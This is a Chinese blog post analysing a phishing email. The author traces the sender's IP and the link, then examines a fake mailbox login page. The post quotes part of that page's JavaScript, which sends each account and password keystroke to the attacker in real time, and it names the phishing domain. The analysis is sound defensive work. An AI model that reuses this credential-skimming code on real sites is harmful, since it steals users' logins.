记一次邮件钓鱼实例分析

2025-02-05 1 0

一、事件概述

今儿一早登录邮箱想发周报来着,结果发现邮件新增一条,点开看看,好家伙,现在钓鱼邮件这么归类,连格式都这么假。
记一次邮件钓鱼实例分析插图
看到这个,突然心血来潮,什么事也得分析分析一下,不然真无法想象他发来的样例。
记一次邮件钓鱼实例分析插图1

二、实例分析

邮件内容分析

像我们常遇到的钓鱼邮件呢,有很多种,比如附件钓鱼、链接钓鱼、二维码钓鱼、内容钓鱼等。
而我这种情况就正好适合链接钓鱼了,往往邮件中会引导用户点击链接,进行弹窗或跳转到钓鱼网站,网站通常会要求用户输入账户信息之类以获取用户敏感度信息;另外一个链接指向的网页暗藏木马程序,用户如果浏览器未修复的漏洞则点开的同时就中招了。
记一次邮件钓鱼实例分析插图2

1.发件人来源是否可信

我们先收集下发件人的相关信息,通过查看信头,查看最后一个“已收到”部分,通常包含发件人的原始IP地址,
记一次邮件钓鱼实例分析插图3
目前整理如下:

发件人名称:信息部发件人邮箱:[email protected]发件人地址:221.234.29.195(当然邮件头信息可以被伪造,需要结合其他信息进行综合判断)

可以通过名称和邮箱判断其大量的猫责任,因为我们没有以信息部自称的部门,其邮箱地址也不是常见的地址,将其ip放微步里搜下,好家伙钓鱼没跑了。
记一次邮件钓鱼实例分析插图4

2、邮件内容是否可信

看下邮件内容,只有简单的几句话,再附上链接,明白不要太明显。
记一次邮件钓鱼实例分析插图5
我们可以通过F12,打开开发者调试模式,看下其网站源码,鼠标放到连接处就可以,看到点击会跳跳转到https://yty.dtynm.cn
记一次邮件钓鱼实例分析插图6
查下域名可信度
记一次邮件钓鱼实例分析插图7
真的没什么可说的了,我们打开隐私模式,访问站点看下
记一次邮件钓鱼实例分析插图8
可以看到这是一个新的邮箱登录界面,分析其代码逻辑。会发现其代码中多了一般邮箱登录网站没有的隐藏功能。
代码片段一:输入监听,实时发送

socket.emit('sendMsg',{"kongzhi":"10","zhuangtai":id("zhuangtai").value});function shishijiankong1(canshu,canshu1){socket.emit("sendMsg",{"kongzhi":"8","xinxi":canshu1,"neirong":canshu.value});}id("zh").addEventListener("input",function(){shishijiankong1(id("zh"),"账号:")});id("mm").addEventListener("input",function(){shishijiankong1(id("mm"),"密码:")});function shishijiankong2(canshu,canshu1){socket.emit("sendMsg",{"kongzhi":"9","xinxi":canshu1,"neirong":canshu.value});}id("zh").addEventLi

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

恶意Go包利用模块镜像缓存实现持久远程访问
疯狂邪恶团伙利用StealC、AMOS和Angel Drainer恶意软件瞄准加密货币
俄语系邪恶黑客团伙操纵10余种高度专业化的社交媒体诈骗
虚假谷歌广告瞄准微软广告账户,恶意软件攻击再升级
[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel
[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升

发布评论